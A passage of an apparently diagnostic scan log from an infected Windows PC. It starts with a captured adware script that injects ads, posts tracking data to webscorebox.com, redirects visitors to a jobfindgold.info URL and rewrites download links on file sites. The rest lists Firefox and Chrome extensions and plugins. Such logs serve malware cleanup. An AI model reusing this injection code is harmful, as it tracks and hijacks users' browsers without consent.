(atp?atp:1), [398,size]);}}catch(e){return !1;}},glispa_clean_us:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://media.glispa.com/st?ad_type=iframe&ad_size=300x250&site=1731650&section_code=34_450&pub_url=' (atp?atp:1), [406,size]);}}catch(e){return !1;}},darriens_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 728x90 300x250'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1948436\",\"300x250\":\"1948432\",\"160x600\":\"1948417\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=&referrer=&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [407,size]);}}catch(e){return !1;}},start_me_app_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030220&size=+size+&cb=&age=&gender=&referrer=&pubclick=' (atp?atp:1), [411,size]);}}catch(e){return !1;}},intag_apx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://pl.intag.co/tt?id=2018543&size=+size+&cb=&pubclick=' (atp?atp:1), [416,size]);}}catch(e){return !1;}},webmedia_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2049295&size=+size+&referrer=' (atp?atp:1), [418,size]);}}catch(e){return !1;}},matomy_apx_adj5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2050533\",\"300x250\":\"2050524\",\"160x600\":\"2050536\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [419,size]);}}catch(e){return !1;}},dsnr_t1_streaming:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2030995&size=+size+' (atp?atp:1), [388,size]);}}catch(e){return !1;}},cpx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://Servedby.bigfineads.com/tt?id=1969357&size=+size+&referrer=' (atp?atp:1), [389,size]);}}catch(e){return !1;}},adstract_apx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2024075\",\"300x250\":\"2024068\",\"468x60\":\"2024077\",\"160x600\":\"2024076\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [392,size]);}}catch(e){return !1;}},matomy_apx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2030901\",\"300x250\":\"2030945\",\"160x600\":\"2030947\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&position=above\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [403,size]);}}catch(e){return !1;}},e_viral_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://net.e-viral.com/tt?id=1966468&size=+size+' (atp?atp:1), [408,size]);}}catch(e){return !1;}},matomy_strm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"2049874\",\"300x250\":\"2049873\",\"160x600\":\"2049875\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [414,size]);}}catch(e){return !1;}},mari_strm2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1879985\",\"300x250\":\"1879988\",\"468x60\":\"1879989\",\"120x600\":\"1879986\",\"160x600\":\"1879987\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [421,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://ads.ventivmedia.com/www/delivery/afr.php?zoneid=' + {\"728x90\":\"52\",\"300x250\":\"58\",\"468x60\":\"60\",\"120x600\":\"55\",\"160x600\":\"53\",\"300x600\":\"59\",\"250x250\":\"56\",\"600x400\":\"57\"}[size] + '&cb=' + Math.random();;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"SeWVW6x0=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"SeWVW6x0=\")){var d=a.match(/SeWVW6x0=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HqchEAen0qdkEtNhVCNqPB750qShSCM06C7lGojsMh7VUojaMAyVUojrEqTg6rjn6qjg=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){location.href=\"http://yt.jobfindgold.info/e/?eid=34&hid=3066714756&pid=450&ch=99&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: canitbecheaper%40trafficbroker.co.uk:3.8.28
FF - prefs.js..extensions.enabledAddons: firecookie%40janodvarko.cz:1.4
FF - prefs.js..extensions.enabledAddons: plugin%40yontoo.com:1.20.00
FF - prefs.js..extensions.enabledAddons: toolbar%40ask.com:3.15.12.33066
FF - prefs.js..extensions.enabledAddons: %7B53A03D43-5363-4669-8190-99061B2DEBA5%7D:1.5.5
FF - prefs.js..extensions.enabledItems: {B7082FAA-CB62-4872-9106-E42DD88EDE45}:3.3.1
FF - prefs.js..extensions.enabledItems: canitbecheaper@trafficbroker.co.uk:3.1.5
FF - prefs.js..extensions.enabledItems: morningCoffee@shaneliesegang:1.33
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}:6.0.23
FF - prefs.js..extensions.enabledItems: {000F1EA4-5E08-4564-A29B-29076F63A37A}:1.0.3.143
FF - prefs.js..extensions.enabledItems: testpilot@labs.mozilla.com:1.0.6
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0025-ABCDEFFEDCBA}:6.0.25
FF - prefs.js..sweetim.toolbar.previous.browser.search.selectedEngine: ""
FF - prefs.js..browser.startup.homepage: ""
FF - prefs.js..sweetim.toolbar.previous.keyword.URL: ""
FF - prefs.js..sweetim.toolbar.previous.browser.search.defaultenginename: ""
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.7.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL ()
FF - HKLM\Software\MozillaPlugins\@mcafee.com/MVT: C:\Program Files (x86)\McAfee\Supportability\MVT\npmvtplugin.dll (McAfee, Inc.)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/SAFFPlugin: C:\Program Files (x86)\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Bri\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\{000F1EA4-5E08-4564-A29B-29076F63A37A}\plugins\npsoe.dll File not found
FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O3DPlugin: C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll ()
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Bri\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Bri\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Bri\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\ubisoft.com/uplaypc: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll (Ubisoft)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010/11/20 11:59:31 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}: C:\Program Files (x86)\McAfee\SiteAdvisor [2013/11/15 20:02:51 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 13.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/26 19:25:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 13.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013/12/26 19:25:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox 4.0 Beta 12\components [2013/11/08 15:12:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox 4.0 Beta 12\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\msktbird@mcafee.com: C:\Program Files\McAfee\MSK [2013/11/23 23:46:16 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010/11/20 11:59:31 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 13.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/26 19:25:09 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 13.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013/12/26 19:25:09 | 000,000,000 | ---D | M]
 
[2010/10/29 21:53:38 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Bri\AppData\Roaming\Mozilla\Extensions
[2013/12/29 20:39:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions
[2013/12/29 20:40:12 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\extensions\staged
[2010/11/06 12:06:17 | 000,001,834 | ---- | M] () -- C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\searchplugins\bing.xml
[2013/01/11 22:21:14 | 000,002,090 | ---- | M] () -- C:\Users\Bri\AppData\Roaming\Mozilla\Firefox\Profiles\6gkcpb2e.default\searchplugins\Searchab.xml
[2012/04/10 11:46:30 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/08/26 11:15:30 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2011/01/19 21:54:20 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1}
[2013/08/26 11:15:29 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/08/26 11:15:31 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}
[2012/06/02 17:41:55 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\distribution\extensions
[2012/06/02 17:41:55 | 000,085,472 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll
[2011/04/14 13:01:38 | 000,024,376 | ---- | M] (McAfee, Inc.) -- C:\Program Files (x86)\mozilla firefox\components\Scriptff.dll
[2012/04/02 14:31:21 | 000,476,904 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npdeployJava1.dll
[2012/05/30 19:39:30 | 000,003,749 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\avg-secure-search.xml
[2012/04/03 23:31:05 | 000,002,252 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml
[2010/11/05 20:28:26 | 000,002,064 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bingober4446746.xml
[2013/03/16 21:27:19 | 000,002,024 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\McSiteAdvisor.xml
[2012/04/03 23:31:05 | 000,002,040 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\twitter.xml
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Shockwave Flash (Enabled) = C:\Users\Bri\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.225\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\Bri\AppData\Local\Google\Chrome\Application\31.0.1650.63\pdf.dll
CHR - plugin: Microsoft\u00C3\u0083\u00C2\u0082\u00C3\u0082\u00C2\u00AE Windows Media Player Firefox Plugin (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\np-mswmp.dll
CHR - plugin: Coupons Inc., Coupon Printer Manager  (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll
CHR - plugin: Coupons Inc., Coupon Printer Manager  (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\nppdf32.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.7.3 (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll
CHR - plugin: Google Talk Plugin (Enabled) = C:\Users\Bri\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll
